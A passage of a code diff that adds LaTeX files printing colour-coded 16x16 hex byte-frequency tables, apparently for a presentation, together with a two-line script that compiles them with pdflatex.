+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy108}{rgb}{0.423,0,0.576}
+\definecolor{Hexy119}{rgb}{0.466,0,0.533}
+\definecolor{Hexy112}{rgb}{0.439,0,0.560}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy88}{rgb}{0.345,0,0.654}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy106}{rgb}{0.415,0,0.584}
+\definecolor{Hexy103}{rgb}{0.403,0,0.596}
+\definecolor{Hexy113}{rgb}{0.443,0,0.556}
+\definecolor{Hexy112}{rgb}{0.439,0,0.560}
+\definecolor{Hexy123}{rgb}{0.482,0,0.517}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy118}{rgb}{0.462,0,0.537}
+\definecolor{Hexy124}{rgb}{0.486,0,0.513}
+\definecolor{Hexy112}{rgb}{0.439,0,0.560}
+\definecolor{Hexy124}{rgb}{0.486,0,0.513}
+\definecolor{Hexy107}{rgb}{0.419,0,0.580}
+\definecolor{Hexy120}{rgb}{0.470,0,0.529}
+\definecolor{Hexy110}{rgb}{0.431,0,0.568}
+\definecolor{Hexy86}{rgb}{0.337,0,0.662}
+\definecolor{Hexy100}{rgb}{0.392,0,0.607}
+\definecolor{Hexy113}{rgb}{0.443,0,0.556}
+\definecolor{Hexy137}{rgb}{0.537,0,0.462}
+\definecolor{Hexy108}{rgb}{0.423,0,0.576}
+\definecolor{Hexy120}{rgb}{0.470,0,0.529}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy223}{rgb}{0.874,0,0.125}
+\definecolor{Hexy122}{rgb}{0.478,0,0.521}
+\definecolor{Hexy121}{rgb}{0.474,0,0.525}
+\definecolor{Hexy86}{rgb}{0.337,0,0.662}
+\definecolor{Hexy130}{rgb}{0.509,0,0.490}
+\definecolor{Hexy118}{rgb}{0.462,0,0.537}
+\definecolor{Hexy119}{rgb}{0.466,0,0.533}
+\definecolor{Hexy124}{rgb}{0.486,0,0.513}
+\definecolor{Hexy113}{rgb}{0.443,0,0.556}
+\definecolor{Hexy127}{rgb}{0.498,0,0.501}
+\definecolor{Hexy105}{rgb}{0.411,0,0.588}
+\definecolor{Hexy0}{rgb}{0,0,0}
+\definecolor{HexyGreen}{rgb}{0,.7,0}
+{\footnotesize
+\begin{semiverbatim}
+total: 6000
+uniq:  52
+\color{HexyGreen}\color{HexyGreen}   00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
+\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy110}6e \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy118}76
+\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy135}87 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy106}6a
+\color{HexyGreen}40 \color{Hexy107}6b \color{Hexy114}72 \color{Hexy106}6a \color{Hexy104}68 \color{Hexy116}74 \color{Hexy102}66 \color{Hexy119}77 \color{Hexy111}6f \color{Hexy109}6d \color{Hexy116}74 \color{Hexy108}6c \color{Hexy119}77 \color{Hexy112}70 \color{Hexy116}74 \color{Hexy88}58 \color{Hexy114}72
+\color{HexyGreen}50 \color{Hexy106}6a \color{Hexy103}67 \color{Hexy113}71 \color{Hexy112}70 \color{Hexy123}7b \color{Hexy116}74 \color{Hexy118}76 \color{Hexy124}7c \color{Hexy112}70 \color{Hexy124}7c \color{Hexy107}6b \color{Hexy120}78 \color{Hexy0}00 \color{Hexy110}6e \color{Hexy86}56 \color{Hexy100}64
+\color{HexyGreen}60 \color{Hexy113}71 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy137}89 \color{Hexy108}6c \color{Hexy120}78 \color{Hexy0}00 \color{Hexy116}74 \color{Hexy114}72 \color{Hexy223}df \color{Hexy122}7a \color{Hexy121}79 \color{Hexy0}00 \color{Hexy86}56 \color{Hexy130}82 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy119}77
+\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy124}7c \color{Hexy0}00 00 \color{Hexy113}71 \color{Hexy127}7f \color{Hexy0}00 00 \color{Hexy105}69 \color{Hexy0}00 00 00
+\end{semiverbatim}
+}

dev/csw05/admtable2.tex

@@ -0,0 +1,77 @@
+\definecolor{Hexy100}{rgb}{0.392,0,0.607}
+\definecolor{Hexy111}{rgb}{0.435,0,0.564}
+\definecolor{Hexy120}{rgb}{0.470,0,0.529}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy127}{rgb}{0.498,0,0.501}
+\definecolor{Hexy107}{rgb}{0.419,0,0.580}
+\definecolor{Hexy111}{rgb}{0.435,0,0.564}
+\definecolor{Hexy123}{rgb}{0.482,0,0.517}
+\definecolor{Hexy121}{rgb}{0.474,0,0.525}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy117}{rgb}{0.458,0,0.541}
+\definecolor{Hexy115}{rgb}{0.450,0,0.549}
+\definecolor{Hexy118}{rgb}{0.462,0,0.537}
+\definecolor{Hexy88}{rgb}{0.345,0,0.654}
+\definecolor{Hexy111}{rgb}{0.435,0,0.564}
+\definecolor{Hexy122}{rgb}{0.478,0,0.521}
+\definecolor{Hexy108}{rgb}{0.423,0,0.576}
+\definecolor{Hexy120}{rgb}{0.470,0,0.529}
+\definecolor{Hexy122}{rgb}{0.478,0,0.521}
+\definecolor{Hexy126}{rgb}{0.494,0,0.505}
+\definecolor{Hexy113}{rgb}{0.443,0,0.556}
+\definecolor{Hexy109}{rgb}{0.427,0,0.572}
+\definecolor{Hexy101}{rgb}{0.396,0,0.603}
+\definecolor{Hexy117}{rgb}{0.458,0,0.541}
+\definecolor{Hexy127}{rgb}{0.498,0,0.501}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy123}{rgb}{0.482,0,0.517}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy113}{rgb}{0.443,0,0.556}
+\definecolor{Hexy119}{rgb}{0.466,0,0.533}
+\definecolor{Hexy109}{rgb}{0.427,0,0.572}
+\definecolor{Hexy100}{rgb}{0.392,0,0.607}
+\definecolor{Hexy113}{rgb}{0.443,0,0.556}
+\definecolor{Hexy124}{rgb}{0.486,0,0.513}
+\definecolor{Hexy100}{rgb}{0.392,0,0.607}
+\definecolor{Hexy115}{rgb}{0.450,0,0.549}
+\definecolor{Hexy107}{rgb}{0.419,0,0.580}
+\definecolor{Hexy121}{rgb}{0.474,0,0.525}
+\definecolor{Hexy135}{rgb}{0.529,0,0.470}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy116}{rgb}{0.454,0,0.545}
+\definecolor{Hexy232}{rgb}{0.909,0,0.090}
+\definecolor{Hexy107}{rgb}{0.419,0,0.580}
+\definecolor{Hexy104}{rgb}{0.407,0,0.592}
+\definecolor{Hexy118}{rgb}{0.462,0,0.537}
+\definecolor{Hexy91}{rgb}{0.356,0,0.643}
+\definecolor{Hexy109}{rgb}{0.427,0,0.572}
+\definecolor{Hexy114}{rgb}{0.447,0,0.552}
+\definecolor{Hexy117}{rgb}{0.458,0,0.541}
+\definecolor{Hexy87}{rgb}{0.341,0,0.658}
+\definecolor{Hexy107}{rgb}{0.419,0,0.580}
+\definecolor{Hexy111}{rgb}{0.435,0,0.564}
+\definecolor{Hexy0}{rgb}{0,0,0}
+\definecolor{HexyGreen}{rgb}{0,.7,0}
+{\footnotesize
+\begin{semiverbatim}
+total: 6000
+uniq:  52
+\color{HexyGreen}\color{HexyGreen}   00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
+\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy100}64 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy111}6f
+\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy120}78 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy116}74
+\color{HexyGreen}40 \color{Hexy127}7f \color{Hexy107}6b \color{Hexy111}6f \color{Hexy123}7b \color{Hexy121}79 \color{Hexy114}72 \color{Hexy117}75 \color{Hexy115}73 \color{Hexy118}76 \color{Hexy88}58 \color{Hexy111}6f \color{Hexy122}7a \color{Hexy108}6c \color{Hexy120}78 \color{Hexy122}7a \color{Hexy126}7e
+\color{HexyGreen}50 \color{Hexy113}71 \color{Hexy109}6d \color{Hexy101}65 \color{Hexy117}75 \color{Hexy127}7f \color{Hexy114}72 \color{Hexy123}7b \color{Hexy114}72 \color{Hexy113}71 \color{Hexy119}77 \color{Hexy109}6d \color{Hexy100}64 \color{Hexy0}00 \color{Hexy113}71 \color{Hexy124}7c \color{Hexy100}64
+\color{HexyGreen}60 \color{Hexy115}73 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy107}6b \color{Hexy121}79 \color{Hexy135}87 \color{Hexy0}00 \color{Hexy116}74 74 \color{Hexy232}e8 \color{Hexy107}6b \color{Hexy104}68 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy91}5b \color{Hexy0}00 \color{Hexy109}6d \color{Hexy114}72
+\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy117}75 \color{Hexy0}00 00 \color{Hexy87}57 \color{Hexy107}6b \color{Hexy0}00 00 \color{Hexy111}6f \color{Hexy0}00 00 00
+\end{semiverbatim}
+}

dev/csw05/csw05.sh

@@ -0,0 +1,4 @@
+#!/bin/sh
+for((i = 0; i < 2; i++)); do
+	pdflatex csw05
+done

dev/csw05/optytable.tex

@@ -0,0 +1,166 @@
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy0}{rgb}{0,0,0}
+\definecolor{HexyGreen}{rgb}{0,.7,0}
+{\footnotesize
+\begin{semiverbatim}
+total: 6000
+uniq:  141
+\color{HexyGreen}\color{HexyGreen}   00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
+\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 \color{Hexy17}11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
+\color{HexyGreen}10 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
+\color{HexyGreen}20 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
+\color{HexyGreen}30 \color{Hexy17}11 11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
+\color{HexyGreen}40 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a
+\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
+\color{HexyGreen}70 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39
+\color{HexyGreen}80 \color{Hexy18}12 12 \color{Hexy0}00 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
+\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
+\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 00 00 00 00
+\color{HexyGreen}b0 \color{Hexy58}3a \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy58}3a \color{Hexy57}39
+\color{HexyGreen}c0 \color{Hexy18}12 12 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
+\color{HexyGreen}d0 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 00 00
+\color{HexyGreen}e0 \color{Hexy57}39 39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
+\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy17}11 11
+\end{semiverbatim}
+}

dev/csw05/optytable2.tex

@@ -0,0 +1,166 @@
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy17}{rgb}{0.066,0,0.933}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy18}{rgb}{0.070,0,0.929}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
+\definecolor{Hexy57}{rgb}{0.223,0,0.776}
+\definecolor{Hexy58}{rgb}{0.227,0,0.772}
